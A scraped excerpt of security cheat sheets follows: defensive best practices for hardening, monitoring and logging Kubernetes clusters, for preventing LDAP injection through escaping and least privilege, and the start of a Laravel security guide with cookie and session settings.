By default, Kubernetes allows every pod to contact every other pod. Traffic to a pod from an external network endpoint outside the cluster is allowed if ingress from that endpoint is allowed to the pod. Traffic from a pod to an external network endpoint outside the cluster is allowed if egress is allowed from the pod to that endpoint.

Network segmentation policies are a key security control that can prevent lateral movement across containers in the case that an attacker breaks in. One of the challenges in Kubernetes deployments is creating network segmentation between pods, services and containers. This is a challenge due to the \u201cdynamic\u201d nature of container network identities (IPs), along with the fact that containers can communicate both inside the same node or between nodes.

Users of Google Cloud Platform can benefit from automatic firewall rules, preventing cross-cluster communication. A similar implementation can be deployed on-premises using network firewalls or SDN solutions. There is work being done in this area by the Kubernetes Network SIG, which will greatly improve the pod-to-pod communication policies. A new network policy API should address the need to create firewall rules around pods, limiting the network access that a containerized application can have.

The following is an example of a network policy (using the stable networking.k8s.io/v1 API) that controls the network for \u201cbackend\u201d pods, only allowing inbound network access from \u201cfrontend\u201d pods on TCP port 80 (the app labels are assumed to be set on the pods):

apiVersion: networking.k8s.io/v1\nkind: NetworkPolicy\nmetadata:\n  name: pol1\n  namespace: tenant-a\nspec:\n  podSelector:\n    matchLabels:\n      app: backend\n  ingress:\n  - from:\n    - podSelector:\n        matchLabels:\n          app: frontend\n    ports:\n    - protocol: TCP\n      port: 80\n

For more information on configuring network policies, refer to the Kubernetes documentation at https://kubernetes.io/docs/concepts/services-networking/network-policies.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#securing-data","title":"Securing data","text":""},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#keep-secrets-as-secrets","title":"Keep secrets as secrets","text":"

In Kubernetes, a Secret is a small object that contains sensitive data, like a password or token. It is important to understand how sensitive data such as credentials and keys are stored and accessed. Even though a pod is not able to access the secrets of another pod, it is crucial to keep the secret separate from an image or pod. Otherwise, anyone with access to the image would have access to the secret as well. Complex applications that handle multiple processes and have public access are especially vulnerable in this regard. It is best for secrets to be mounted into read-only volumes in your containers, rather than exposing them as environment variables.
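
A minimal sketch of mounting a Secret as a read-only volume (the Secret name api-credentials and the image reference are hypothetical):

apiVersion: v1\nkind: Pod\nmetadata:\n  name: app\nspec:\n  containers:\n  - name: app\n    image: registry.example.com/app:1.0\n    volumeMounts:\n    - name: api-credentials\n      mountPath: /etc/secrets\n      readOnly: true   # secret files are exposed read-only inside the container\n  volumes:\n  - name: api-credentials\n    secret:\n      secretName: api-credentials\n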

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#encrypt-secrets-at-rest","title":"Encrypt secrets at rest","text":"

The etcd database in general contains any information accessible via the Kubernetes API and may grant an attacker significant visibility into the state of your cluster.

Always encrypt your backups using a well reviewed backup and encryption solution, and consider using full disk encryption where possible.

Kubernetes supports encryption at rest, a feature introduced in 1.7, and v1 beta since 1.13. This will encrypt Secret resources in etcd, preventing parties that gain access to your etcd backups from viewing the content of those secrets. While this feature is currently beta, it offers an additional level of defense when backups are not encrypted or an attacker gains read access to etcd.
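
As an illustrative sketch, encryption at rest is configured by passing an EncryptionConfiguration file to kube-apiserver via the --encryption-provider-config flag (the key material below is a placeholder):

apiVersion: apiserver.config.k8s.io/v1\nkind: EncryptionConfiguration\nresources:\n- resources:\n  - secrets\n  providers:\n  # Secrets are encrypted with AES-CBC using the first key; the identity\n  # provider allows reading secrets written before encryption was enabled.\n  - aescbc:\n      keys:\n      - name: key1\n        secret: <BASE64-ENCODED-32-BYTE-KEY>\n  - identity: {}\n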

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#alternatives-to-kubernetes-secret-resources","title":"Alternatives to Kubernetes Secret resources","text":"

You may want to consider using an external secrets manager to store and manage your secrets rather than storing them in Kubernetes Secrets. This provides a number of benefits over using Kubernetes Secrets, including the ability to manage secrets across multiple clusters (or clouds), and the ability to manage and rotate secrets centrally.

For more information on Secrets and their alternatives, refer to the documentation at https://kubernetes.io/docs/concepts/configuration/secret/.

Also see the Secrets Management cheat sheet for more details and best practices on managing secrets.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#finding-exposed-secrets","title":"Finding exposed secrets","text":"

Open-source tools such as SecretScanner and ThreatMapper can scan container filesystems for sensitive resources, such as API tokens, passwords, and keys. Such resources would be accessible to any user who had access to the unencrypted container filesystem, whether during build, at rest in a registry or backup, or running.

Review the secret material present on the container against the principle of least privilege, and assess the risk posed by a compromise.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#kubernetes-security-best-practices-runtime-phase","title":"Kubernetes Security Best Practices: Runtime Phase","text":"

The runtime phase exposes containerized applications to a slew of new security challenges. Your goal here is to both gain visibility into your running environment and detect and respond to threats as they arise.

Proactively securing your containers and Kubernetes deployments at the build and deploy phases can greatly reduce the likelihood of security incidents at runtime and the subsequent effort needed to respond to them.

First, you must monitor the most security-relevant container activities, including:

Observing container behavior to detect anomalies is generally easier in containers than in virtual machines because of the declarative nature of containers and Kubernetes. These attributes allow easier introspection into what you have deployed and its expected activity.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#use-pod-security-policies-to-prevent-risky-containerspods-from-being-used","title":"Use Pod Security Policies to prevent risky containers/Pods from being used","text":"

PodSecurityPolicy is a cluster-level resource available in Kubernetes (via kubectl) that is highly recommended. You must enable the PodSecurityPolicy admission controller to use it. Given the nature of admission controllers, you must authorize at least one policy - otherwise no pods will be allowed to be created in the cluster. (Note that PodSecurityPolicy was deprecated in Kubernetes 1.21 and removed in 1.25; on newer clusters, the built-in Pod Security Admission controller provides similar controls.)

Pod Security Policies address several critical security use cases, including:

For more information on Pod security policies, refer to the documentation at https://kubernetes.io/docs/concepts/policy/pod-security-policy/.
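
For clusters that still support PodSecurityPolicy, a restrictive policy might look roughly like the following sketch:

apiVersion: policy/v1beta1\nkind: PodSecurityPolicy\nmetadata:\n  name: restricted\nspec:\n  privileged: false\n  allowPrivilegeEscalation: false\n  requiredDropCapabilities:\n  - ALL\n  runAsUser:\n    rule: MustRunAsNonRoot   # refuse containers that run as root\n  seLinux:\n    rule: RunAsAny\n  fsGroup:\n    rule: RunAsAny\n  supplementalGroups:\n    rule: RunAsAny\n  volumes:\n  - configMap\n  - secret\n  - emptyDir\n  - projected\n  - downwardAPI\n  - persistentVolumeClaim\n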

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#container-runtime-security","title":"Container Runtime Security","text":"

Hardening containers at runtime gives security teams the ability to detect and respond to threats and anomalies while the containers or workloads are in a running state. This is typically carried out by intercepting the low-level system calls and looking for events that may indicate compromise. Some examples of events that should trigger an alert would include:
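
As an illustrative sketch only, loosely based on the rule syntax used by runtime security tools such as Falco, a rule alerting on one such event (an interactive shell spawned inside a container) might look like this:

- rule: shell_in_container\n  desc: Detect a shell being spawned inside a container\n  condition: evt.type = execve and container.id != host and proc.name in (bash, sh, zsh)\n  output: \"Shell started in container (user=%user.name container=%container.name command=%proc.cmdline)\"\n  priority: WARNING\n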

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#container-sandboxing","title":"Container Sandboxing","text":"

Container runtimes are typically permitted to make direct calls to the host kernel, which then interacts with hardware and devices to respond to the request. Cgroups and namespaces exist to give containers a certain amount of isolation, but the kernel still presents a large attack surface. In multi-tenant and highly untrusted clusters, an additional layer of sandboxing is often required to protect against container breakout and kernel exploits. Below we will explore a few OSS technologies that help further isolate running containers from the host kernel:
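
For example, assuming a gVisor runtime (runsc) has been installed on the nodes, a RuntimeClass can be defined and selected per Pod; this is a sketch, not a full installation guide:

apiVersion: node.k8s.io/v1\nkind: RuntimeClass\nmetadata:\n  name: gvisor\nhandler: runsc   # the sandboxed runtime configured on the nodes\n---\napiVersion: v1\nkind: Pod\nmetadata:\n  name: sandboxed-pod\nspec:\n  runtimeClassName: gvisor\n  containers:\n  - name: app\n    image: busybox\n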

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#preventing-containers-from-loading-unwanted-kernel-modules","title":"Preventing containers from loading unwanted kernel modules","text":"

The Linux kernel automatically loads kernel modules from disk if needed in certain circumstances, such as when a piece of hardware is attached or a filesystem is mounted. Of particular relevance to Kubernetes, even unprivileged processes can cause certain network-protocol-related kernel modules to be loaded, just by creating a socket of the appropriate type. This may allow an attacker to exploit a security hole in a kernel module that the administrator assumed was not in use.

To prevent specific modules from being automatically loaded, you can uninstall them from the node, or add rules to block them. On most Linux distributions, you can do that by creating a file such as /etc/modprobe.d/kubernetes-blacklist.conf with contents like:

# DCCP is unlikely to be needed, has had multiple serious\n# vulnerabilities, and is not well-maintained.\nblacklist dccp\n\n# SCTP is not used in most Kubernetes clusters, and has also had\n# vulnerabilities in the past.\nblacklist sctp\n

To block module loading more generically, you can use a Linux Security Module (such as SELinux) to completely deny the module_request permission to containers, preventing the kernel from loading modules for containers under any circumstances. (Pods would still be able to use modules that had been loaded manually, or modules that were loaded by the kernel on behalf of some more-privileged process.)

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#compare-and-analyze-different-runtime-activity-in-pods-of-the-same-deployments","title":"Compare and analyze different runtime activity in pods of the same deployments","text":"

Containerized applications are replicated for high availability, fault tolerance, or scale reasons. Replicas should behave nearly identically; replicas with significant deviations from the others warrant further investigation. Integrate your Kubernetes security tool with other external systems (email, PagerDuty, Slack, Google Cloud Security Command Center, SIEMs [security information and event management], etc.) and leverage deployment labels or annotations to alert the team responsible for a given application when a potential threat is detected. Commercial Kubernetes security vendors should support a wide array of integrations with external tools.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#monitor-network-traffic-to-limit-unnecessary-or-insecure-communication","title":"Monitor network traffic to limit unnecessary or insecure communication","text":"

Observe your active network traffic and compare that traffic to what is allowed based on your Kubernetes network policies. Containerized applications typically make extensive use of cluster networking, and observing active networking traffic is a good way to understand how applications interact with each other and identify unexpected communication.

At the same time, comparing the active traffic with what's allowed gives you valuable information about what isn't happening but is allowed. With that information, you can further tighten your allowed network policies so that they remove superfluous connections and decrease your attack surface.

Open source projects like https://github.com/kinvolk/inspektor-gadget or https://github.com/deepfence/PacketStreamer may help with this, and commercial security solutions provide varying degrees of container network traffic analysis.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#if-breached-scale-suspicious-pods-to-zero","title":"If breached, scale suspicious pods to zero","text":"

Use Kubernetes native controls to contain a successful breach by automatically instructing Kubernetes to scale suspicious pods to zero, or to kill and then restart instances of breached applications.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#rotate-infrastructure-credentials-frequently","title":"Rotate infrastructure credentials frequently","text":"

The shorter the lifetime of a secret or credential the harder it is for an attacker to make use of that credential. Set short lifetimes on certificates and automate their rotation. Use an authentication provider that can control how long issued tokens are available and use short lifetimes where possible. If you use service account tokens in external integrations, plan to rotate those tokens frequently. For example, once the bootstrap phase is complete, a bootstrap token used for setting up nodes should be revoked or its authorization removed.
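
For example, bootstrap tokens created during node setup with kubeadm can be listed and revoked once they are no longer needed (the commands below are a sketch for kubeadm-based clusters):

# List bootstrap tokens and their expiry\nkubeadm token list\n\n# Revoke a bootstrap token once the bootstrap phase is complete\nkubeadm token delete <token-id>\n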

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#receiving-alerts-for-security-updates-and-reporting-vulnerabilities","title":"Receiving alerts for security updates and reporting vulnerabilities","text":"

Join the kubernetes-announce group (https://kubernetes.io/docs/reference/issues-security/security/) for emails about security announcements. See the security reporting page (https://kubernetes.io/docs/reference/issues-security/security) for more on how to report vulnerabilities.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#logging","title":"Logging","text":"

Kubernetes supplies cluster-based logging, allowing you to log container activity into a central log hub. When a cluster is created, the standard output and standard error of each container can be ingested using a Fluentd agent running on each node into either Google Stackdriver Logging or into Elasticsearch and viewed with Kibana.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#enable-audit-logging","title":"Enable audit logging","text":"

The audit logger is a beta feature that records actions taken by the API server for later analysis in the event of a compromise. It is recommended to enable audit logging and archive the audit file on a secure server.
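
As a sketch, audit logging is enabled by starting kube-apiserver with flags such as the following (paths and retention values are illustrative):

kube-apiserver \\\n  --audit-policy-file=/etc/kubernetes/audit-policy.yaml \\\n  --audit-log-path=/var/log/kubernetes/audit.log \\\n  --audit-log-maxage=30 \\\n  --audit-log-maxbackup=10 \\\n  --audit-log-maxsize=100\n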

Ensure logs are monitored for anomalous or unwanted API calls, especially any authorization failures (these log entries will have a status message \u201cForbidden\u201d). Authorization failures could mean that an attacker is trying to abuse stolen credentials.

Managed Kubernetes providers, including GKE, provide access to this data in their cloud console and may allow you to set up alerts on authorization failures.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#audit-logs","title":"Audit logs","text":"

Audit logs can be useful for compliance as they should help you answer the questions of what happened, who did what and when. Kubernetes provides flexible auditing of kube-apiserver requests based on policies. These help you track all activities in chronological order.

Here is an example of an audit log:

{\n\"kind\":\"Event\",\n\"apiVersion\":\"audit.k8s.io/v1beta1\",\n\"metadata\":{ \"creationTimestamp\":\"2019-08-22T12:00:00Z\" },\n\"level\":\"Metadata\",\n\"timestamp\":\"2019-08-22T12:00:00Z\",\n\"auditID\":\"23bc44ds-2452-242g-fsf2-4242fe3ggfes\",\n\"stage\":\"RequestReceived\",\n\"requestURI\":\"/api/v1/namespaces/default/persistentvolumeclaims\",\n\"verb\":\"list\",\n\"user\": {\n\"username\":\"user@example.org\",\n\"groups\":[ \"system:authenticated\" ]\n},\n\"sourceIPs\":[ \"172.12.56.1\" ],\n\"objectRef\": {\n\"resource\":\"persistentvolumeclaims\",\n\"namespace\":\"default\",\n\"apiVersion\":\"v1\"\n},\n\"requestReceivedTimestamp\":\"2019-08-22T12:00:00Z\",\n\"stageTimestamp\":\"2019-08-22T12:00:00Z\"\n}\n
"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#define-audit-policies","title":"Define Audit Policies","text":"

Audit policy defines rules about what events should be recorded and what data they should include. The audit policy object structure is defined in the audit.k8s.io API group. When an event is processed, it's compared against the list of rules in order. The first matching rule sets the \"audit level\" of the event.

The known audit levels are as follows: None (don't log events that match the rule), Metadata (log request metadata such as the requesting user, timestamp, resource and verb, but not the request or response body), Request (log event metadata and the request body, but not the response body), and RequestResponse (log event metadata together with both the request and response bodies).

You can pass a file with the policy to kube-apiserver using the --audit-policy-file flag. If the flag is omitted, no events are logged. Note that the rules field must be provided in the audit policy file. A policy with no (0) rules is treated as illegal.
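
A minimal sketch of such a policy file (the resource selections are illustrative) might look like this:

apiVersion: audit.k8s.io/v1\nkind: Policy\nrules:\n# Never record the request or response body for secrets, only metadata\n- level: Metadata\n  resources:\n  - group: \"\"\n    resources: [\"secrets\"]\n# Record full request and response bodies for pod changes\n- level: RequestResponse\n  resources:\n  - group: \"\"\n    resources: [\"pods\"]\n# Everything else: metadata only\n- level: Metadata\n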

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#understanding-logging","title":"Understanding Logging","text":"

One main challenge with logging in Kubernetes is understanding what logs are generated and how to use them. Let's start by examining the Kubernetes logging architecture from a bird's-eye view.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#container-logging","title":"Container logging","text":"

The first layer of logs that can be collected from a Kubernetes cluster are those being generated by your containerized applications.

The following is an example of a Pod manifest whose container writes the current date to standard output every second:

apiVersion: v1\nkind: Pod\nmetadata:\n  name: example\nspec:\n  containers:\n  - name: example\n    image: busybox\n    args: [/bin/sh, -c, 'while true; do echo $(date); sleep 1; done']\n

To apply the manifest, run:

kubectl apply -f example.yaml\n

To take a look at the logs for this container, run:

kubectl logs <pod-name>\n

The following Pod manifest uses a sidecar container to expose a log file that the application writes to a shared volume:

apiVersion: v1\nkind: Pod\nmetadata:\n  name: example\nspec:\n  containers:\n  - name: example\n    image: busybox\n    args:\n    - /bin/sh\n    - -c\n    - >\n      while true;\n      do\n        echo \"$(date)\\n\" >> /var/log/example.log;\n        sleep 1;\n      done\n    volumeMounts:\n    - name: varlog\n      mountPath: /var/log\n  - name: sidecar\n    image: busybox\n    args: [/bin/sh, -c, 'tail -f /var/log/example.log']\n    volumeMounts:\n    - name: varlog\n      mountPath: /var/log\n  volumes:\n  - name: varlog\n    emptyDir: {}\n
"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#node-logging","title":"Node logging","text":"

When a container running on Kubernetes writes its logs to stdout or stderr streams, the container engine streams them to the logging driver configured in Kubernetes.

In most cases, these logs will end up in the /var/log/containers directory on your host. Docker supports multiple logging drivers but unfortunately, driver configuration is not supported via the Kubernetes API.

Once a container is terminated or restarted, kubelet stores its logs on the node. To prevent these files from consuming all of the host's storage, the Kubernetes node implements a log rotation mechanism. When a pod is evicted from the node, its containers are evicted along with their corresponding log files.

Depending on what operating system and additional services you're running on your host machine, you might need to take a look at additional logs. For example, logs for systemd services such as the kubelet can be retrieved with the following command:

journalctl -u kubelet\n
"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#cluster-logging","title":"Cluster logging","text":"

On the level of the Kubernetes cluster itself, there is a long list of cluster components that can be logged, as well as additional data types that can be used (events, audit logs). Together, these different types of data can give you visibility into how Kubernetes is performing as a system.

Some of these components run in a container, and some of them run on the operating system level (in most cases, a systemd service). The systemd services write to journald, and components running in containers write logs to the /var/log directory, unless the container engine has been configured to stream logs differently.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#events","title":"Events","text":"

Kubernetes events can indicate any Kubernetes resource state changes and errors, such as exceeded resource quota or pending pods, as well as any informational messages.

The following command returns all events within a specific namespace:

kubectl get events -n <namespace>\n\nNAMESPACE LAST SEEN TYPE   REASON OBJECT MESSAGE\nkube-system  8m22s  Normal   Scheduled            pod/metrics-server-66dbbb67db-lh865                                       Successfully assigned kube-system/metrics-server-66dbbb67db-lh865 to aks-agentpool-42213468-1\nkube-system     8m14s               Normal    Pulling                   pod/metrics-server-66dbbb67db-lh865                                       Pulling image \"aksrepos.azurecr.io/mirror/metrics-server-amd64:v0.2.1\"\nkube-system     7m58s               Normal    Pulled                    pod/metrics-server-66dbbb67db-lh865                                       Successfully pulled image \"aksrepos.azurecr.io/mirror/metrics-server-amd64:v0.2.1\"\nkube-system     7m57s               Normal     Created                   pod/metrics-server-66dbbb67db-lh865                                       Created container metrics-server\nkube-system     7m57s               Normal    Started                   pod/metrics-server-66dbbb67db-lh865                                       Started container metrics-server\nkube-system     8m23s               Normal    SuccessfulCreate          replicaset/metrics-server-66dbbb67db             Created pod: metrics-server-66dbbb67db-lh865\n

The following command will show the latest events for this specific Kubernetes resource:

kubectl describe pod <pod-name>\n\nEvents:\n  Type    Reason     Age   From                               Message\n  ----    ------     ----  ----                               -------\n  Normal  Scheduled  14m   default-scheduler                  Successfully assigned kube-system/coredns-7b54b5b97c-dpll7 to aks-agentpool-42213468-1\n  Normal  Pulled     13m   kubelet, aks-agentpool-42213468-1  Container image \"aksrepos.azurecr.io/mirror/coredns:1.3.1\" already present on machine\n  Normal  Created    13m   kubelet, aks-agentpool-42213468-1  Created container coredns\n  Normal  Started    13m   kubelet, aks-agentpool-42213468-1  Started container coredns\n
"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#final-thoughts","title":"Final thoughts","text":""},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#embed-security-earlier-into-the-container-lifecycle","title":"Embed security earlier into the container lifecycle","text":"

You must integrate security earlier into the container lifecycle and ensure alignment and shared goals between security and DevOps teams. Security can (and should) be an enabler that allows your developers and DevOps teams to confidently build and deploy applications that are production-ready for scale, stability and security.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#use-kubernetes-native-security-controls-to-reduce-operational-risk","title":"Use Kubernetes-native security controls to reduce operational risk","text":"

Leverage the native controls built into Kubernetes whenever available in order to enforce security policies so that your security controls don\u2019t collide with the orchestrator. Instead of using a third-party proxy or shim to enforce network segmentation, as an example, use Kubernetes network policies to ensure secure network communication.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#leverage-the-context-that-kubernetes-provides-to-prioritize-remediation-efforts","title":"Leverage the context that Kubernetes provides to prioritize remediation efforts","text":"

In sprawling Kubernetes environments, manually triaging security incidents and policy violations is time consuming.

For example, a deployment containing a vulnerability with a severity score of 7 or greater should be moved up in remediation priority if that deployment contains privileged containers and is open to the Internet, but moved down if it's in a test environment and supports a non-critical app.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#references","title":"References","text":"

Master documentation - https://kubernetes.io

  1. Kubernetes Security Best Practices everyone must follow - https://www.cncf.io/blog/2019/01/14/9-kubernetes-security-best-practices-everyone-must-follow
  2. Security Best Practices for Kubernetes Deployment - https://kubernetes.io/blog/2016/08/security-best-practices-kubernetes-deployment
  3. Securing a Cluster - https://kubernetes.io/docs/tasks/administer-cluster/securing-a-cluster
  4. Kubernetes Security Best Practices - https://phoenixnap.com/kb/kubernetes-security-best-practices
  5. Kubernetes Security 101: Risks and 29 Best Practices - https://www.stackrox.com/post/2020/05/kubernetes-security-101
  6. 15 Kubernetes security best practice to secure your cluster - https://www.mobilise.cloud/15-kubernetes-security-best-practice-to-secure-your-cluster
  7. The Ultimate Guide to Kubernetes Security - https://neuvector.com/container-security/kubernetes-security-guide
  8. A hacker's guide to Kubernetes security - https://techbeacon.com/enterprise-it/hackers-guide-kubernetes-security
  9. 11 Ways (Not) to Get Hacked - https://kubernetes.io/blog/2018/07/18/11-ways-not-to-get-hacked
  10. 12 Kubernetes configuration best practices - https://www.stackrox.com/post/2019/09/12-kubernetes-configuration-best-practices/#6-securely-configure-the-kubernetes-api-server
  11. A Practical Guide to Kubernetes Logging - https://logz.io/blog/a-practical-guide-to-kubernetes-logging
  12. Kubernetes Web UI (Dashboard) - https://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard
  13. Tesla cloud resources are hacked to run cryptocurrency-mining malware - https://arstechnica.com/information-technology/2018/02/tesla-cloud-resources-are-hacked-to-run-cryptocurrency-mining-malware
  14. OPEN POLICY AGENT: CLOUD-NATIVE AUTHORIZATION - https://blog.styra.com/blog/open-policy-agent-authorization-for-the-cloud
  15. Introducing Policy As Code: The Open Policy Agent (OPA) - https://www.magalix.com/blog/introducing-policy-as-code-the-open-policy-agent-opa
  16. What service mesh provides - https://aspenmesh.io/wp-content/uploads/2019/10/AspenMesh_CompleteGuide.pdf
  17. Three Technical Benefits of Service Meshes and their Operational Limitations, Part 1 - https://glasnostic.com/blog/service-mesh-istio-limits-and-benefits-part-1
  18. Open Policy Agent: What Is OPA and How It Works (Examples) - https://spacelift.io/blog/what-is-open-policy-agent-and-how-it-works
  19. Send Kubernetes Metrics To Kibana and Elasticsearch - https://logit.io/sources/configure/kubernetes/
  20. Kubernetes Security Checklist - https://kubernetes.io/docs/concepts/security/security-checklist/
"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html","title":"LDAP Injection Prevention Cheat Sheet","text":""},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheatsheet is focused on providing clear, simple, actionable guidance for preventing LDAP Injection flaws in your applications.

LDAP Injection is an attack used to exploit web-based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements through techniques similar to SQL Injection.

LDAP injection attacks could result in the granting of permissions to unauthorized queries, and content modification inside the LDAP tree.

For more information on LDAP Injection attacks, visit LDAP injection.

LDAP injection attacks are common due to two factors:

  1. The lack of safer, parameterized LDAP query interfaces
  2. The widespread use of LDAP to authenticate users to systems.

Primary Defenses:

Additional Defenses:

"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#primary-defenses","title":"Primary Defenses","text":""},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#defense-option-1-escape-all-variables-using-the-right-ldap-encoding-function","title":"Defense Option 1: Escape all variables using the right LDAP encoding function","text":""},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#distinguished-name-escaping","title":"Distinguished Name Escaping","text":"

The main way LDAP stores names is based on DN (distinguished name). You can think of this like a unique identifier. These are sometimes used to access resources, like a username.

A DN might look like this

cn=Richard\u00a0Feynman,\u00a0ou=Physics\u00a0Department,\u00a0dc=Caltech,\u00a0dc=edu

or

uid=inewton,\u00a0ou=Mathematics\u00a0Department,\u00a0dc=Cambridge,\u00a0dc=com

There are certain characters that are considered special characters in a DN.

The exhaustive list is the following: \\ # + < > , ; \" = and leading or trailing spaces.

Some \"special\" characters that are allowed in Distinguished Names and do not need to be escaped include:

* ( ) . & - _ [ ] ` ~ | @ $ % ^ ? : { } ! '\n
"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#search-filter-escaping","title":"Search Filter Escaping","text":"

Each DN points to exactly 1 entry, which can be thought of sort of like a row in an RDBMS. For each entry, there will be 1 or more attributes which are analogous to RDBMS columns. If you are interested in searching through LDAP for users with certain attributes, you may do so with search filters.

In a search filter, you can use standard boolean logic to get a list of users matching an arbitrary constraint. Search filters are written in Polish notation AKA prefix notation.

Example:

(&(ou=Physics)(|\n(manager=cn=Freeman\u00a0Dyson,ou=Physics,dc=Caltech,dc=edu)\n(manager=cn=Albert\u00a0Einstein,ou=Physics,dc=Princeton,dc=edu)\n))\n

When building LDAP queries in application code, you MUST escape any untrusted data that is added to any LDAP query. There are two forms of LDAP escaping. Encoding for LDAP Search and Encoding for LDAP DN (distinguished name). The proper escaping depends on whether you are sanitizing input for a search filter, or you are using a DN as a username-like credential for accessing some resource.

Some \"special\" characters that are allowed in search filters and must be escaped include:

* ( ) \\ NUL\n

For more information on search filter escaping visit RFC4515.

"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#safe-java-escaping-example","title":"Safe Java Escaping Example","text":""},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#safe-c-sharp-net-tba-example","title":"Safe C Sharp .NET TBA Example","text":"

.NET AntiXSS (now the Encoder class) has LDAP encoding functions including Encoder.LdapFilterEncode(string), Encoder.LdapDistinguishedNameEncode(string) and Encoder.LdapDistinguishedNameEncode(string, bool, bool).

Encoder.LdapFilterEncode encodes input according to RFC4515 where unsafe values are converted to \\XX where XX is the representation of the unsafe character.

Encoder.LdapDistinguishedNameEncode encodes input according to RFC2253 where unsafe characters are converted to #XX where XX is the representation of the unsafe character and the comma, plus, quote, slash, less than and greater than signs are escaped using slash notation (\\X). In addition, a space or octothorpe (#) at the beginning of the input string is escaped with \\, as is a space at the end of the string.

LdapDistinguishedNameEncode(string, bool, bool) is also provided so you may turn off the initial or final character escaping rules, for example if you are concatenating the escaped distinguished name fragment into the midst of a complete distinguished name.

"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#defense-option-2-use-frameworks-that-automatically-protect-from-ldap-injection","title":"Defense Option 2: Use Frameworks that Automatically Protect from LDAP Injection","text":"

Safe .NET Example

LINQ to Active Directory provides automatic LDAP encoding when building LDAP queries.

"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#defense-option-3-additional-defenses","title":"Defense Option 3: Additional Defenses","text":"

Beyond adopting one of the two primary defenses, we also recommend adopting all of these additional defenses in order to provide defense in depth. These additional defenses are:

"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#least-privilege","title":"Least Privilege","text":"

To minimize the potential damage of a successful LDAP injection attack, you should minimize the privileges assigned to the LDAP binding account in your environment.

"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#enabling-bind-authentication","title":"Enabling Bind Authentication","text":"

If the LDAP protocol is configured with bind authentication, attackers would not be able to perform LDAP injection attacks because of the verification and authorization checks that are performed against valid credentials passed by the user. An attacker can still bypass bind authentication through an anonymous connection or by exploiting the use of unauthenticated bind: Anonymous Bind (LDAP) and Unauthenticated Bind (LDAP).

"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#allow-list-input-validation","title":"Allow-List Input Validation","text":"

Input validation can be used to detect unauthorized input before it is passed to the LDAP query. For more information please see the Input Validation Cheat Sheet.

"},{"location":"cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html#related-articles","title":"Related Articles","text":""},{"location":"cheatsheets/Laravel_Cheat_Sheet.html","title":"Laravel Cheat Sheet","text":""},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This Cheatsheet intends to provide security tips to developers building Laravel applications. It aims to cover all common vulnerabilities and how to ensure that your Laravel applications are secure.

The Laravel Framework provides in-built security features and is meant to be secure by default. However, it also provides additional flexibility for complex use cases. This means that developers unfamiliar with the inner workings of Laravel may fall into the trap of using complex features in a way that is not secure. This guide is meant to educate developers to avoid common pitfalls and develop Laravel applications in a secure manner.

You may also refer to the Enlightn Security Documentation, which highlights common vulnerabilities and good practices on securing Laravel applications.

"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#the-basics","title":"The Basics","text":"
APP_DEBUG=false\n
php artisan key:generate\n
"},{"location":"cheatsheets/Laravel_Cheat_Sheet.html#cookie-security-and-session-management","title":"Cookie Security and Session Management","text":"

By default, Laravel is configured in a secure manner. However, if you change your cookie or session configurations, make sure of the following:

/**\n * The application's route middleware groups.\n *\n * @var array\n */\nprotected $middlewareGroups = [\n    'web' => [\n        \\App\\Http\\Middleware\\EncryptCookies::class,\n        ...\n    ],\n    ...\n];\n
'http_only' => true,\n
'domain' => null,\n
'same_site' => 'lax',\n
'secure' => null,\n
'lifetime' => 15,\n

You may also refer the Cookie Security Guide to learn more about cookie security and the cookie attributes mentioned above.

